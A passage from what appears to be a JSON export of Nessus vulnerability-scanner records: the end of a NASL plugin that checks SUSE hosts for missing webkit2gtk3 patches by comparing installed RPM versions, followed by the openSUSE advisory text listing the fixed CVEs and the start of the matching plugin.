value:\"https://www.suse.com/security/cve/CVE-2017-13885/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7160/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11646/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11712/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11713/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12911/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4088/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4096/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4101/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4113/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4114/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4118/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4119/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4120/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4121/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4122/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4125/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4133/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4162/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4163/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4190/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4199/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4200/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4204/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4218/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4246/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183387-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a02e1c7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2432=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:55:00", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command injection (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\n - Properly close the connection to the nested wayland compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and destroyed quickly.\n\n - Fix a network process crash when load is cancelled while searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with WebKitCookieManager.\n\n - New web process API to detect when form is submitted via JavaScript.\n\n - Several improvements and fixes in the touch/gestures support.\n\n - Support for the &ldquo;system&rdquo; CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build with asan support.\n\n - Fix a crash a under Wayland when using mesa software rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via JavaScript.\n\n - Add new API to replace webkit_form_submission_request_get_text_fields() that is now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes between points and pixels.\n\n - Ensure cookie operations take effect when they happen before a web process has been spawned.\n\n - Automatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12911", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1288.NASL", "href": "https://www.tenable.com/plugins/nessus/118453", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118453);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)\");\n script_summary(english:\"Check for the openSUSE-2018-1288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in\n xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote\n attackers to spoof user-interface information (about\n whether the entire content is derived from a valid TLS\n session) via a crafted website that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote\n attackers to execute arbitrary code via special\n characters that trigger command injection (bsc#1075775,\n bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free\n (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial 